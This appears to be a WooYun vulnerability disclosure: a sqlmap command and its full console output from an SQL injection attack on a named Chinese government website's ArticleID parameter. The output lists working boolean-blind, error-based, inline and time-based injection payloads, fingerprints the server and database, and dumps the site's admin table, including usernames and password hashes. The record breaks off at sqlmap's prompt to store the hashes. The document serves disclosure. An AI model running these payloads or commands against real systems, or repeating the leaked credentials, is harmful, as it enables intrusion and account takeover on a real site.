WooYun.org

涉及站点

http://www.cqyzga.gov.cn/Article/DisplayNews.asp?ArticleID=504
F:\Python27\sqlmap>sqlmap.py -u "http://www.cqyzga.gov.cn/Article/DisplayNews.as
p?ArticleID=504" --dump -T PE_Admin -C "AdminName,Password"
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150529}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 22:42:17
[22:42:17] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:42:17] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: ArticleID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ArticleID=504 AND 1057=1057
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ArticleID=504 AND 6539=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR
(113)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (6539=6539) THEN CHAR(49) ELSE CHAR
(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(118)+CHAR(113)))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: ArticleID=(SELECT CHAR(113)+CHAR(118)+CHAR(113)+CHAR(112)+CHAR(113)
+(SELECT (CASE WHEN (9418=9418) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR
(98)+CHAR(113)+CHAR(118)+CHAR(113))
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ArticleID=504 WAITFOR DELAY '0:0:5'
---
[22:42:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[22:42:19] [WARNING] missing database parameter. sqlmap is going to use the curr
ent database to enumerate table(s) entries
[22:42:19] [INFO] fetching current database
[22:42:19] [INFO] resumed: webserveryzfj
[22:42:19] [INFO] fetching columns 'AdminName, Password' for table 'PE_Admin' in
 database 'webserveryzfj'
[22:42:19] [INFO] heuristics detected web page charset 'GB2312'
[22:42:19] [INFO] the SQL query used returns 2 entries
[22:42:19] [INFO] retrieved: AdminName
[22:42:19] [INFO] retrieved: nvarchar
[22:42:19] [INFO] retrieved: Password
[22:42:20] [INFO] retrieved: nvarchar
[22:42:20] [INFO] fetching entries of column(s) 'AdminName, Password' for table
'PE_Admin' in database 'webserveryzfj'
[22:42:20] [INFO] retrieved: 2
[22:42:20] [INFO] fetching number of distinct values for column 'Password'
[22:42:20] [INFO] retrieved: 2
[22:42:20] [INFO] using column 'Password' as a pivot for retrieving row data
[22:42:20] [INFO] retrieved: 16aebbaa0ac28d51
[22:42:21] [INFO] retrieved: admin
[22:42:21] [INFO] retrieved: ed5683a45f67a668
[22:42:21] [INFO] retrieved: 管理员
[22:42:21] [INFO] analyzing table dump for possible password hashes
[22:42:21] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing
with other tools [y/N]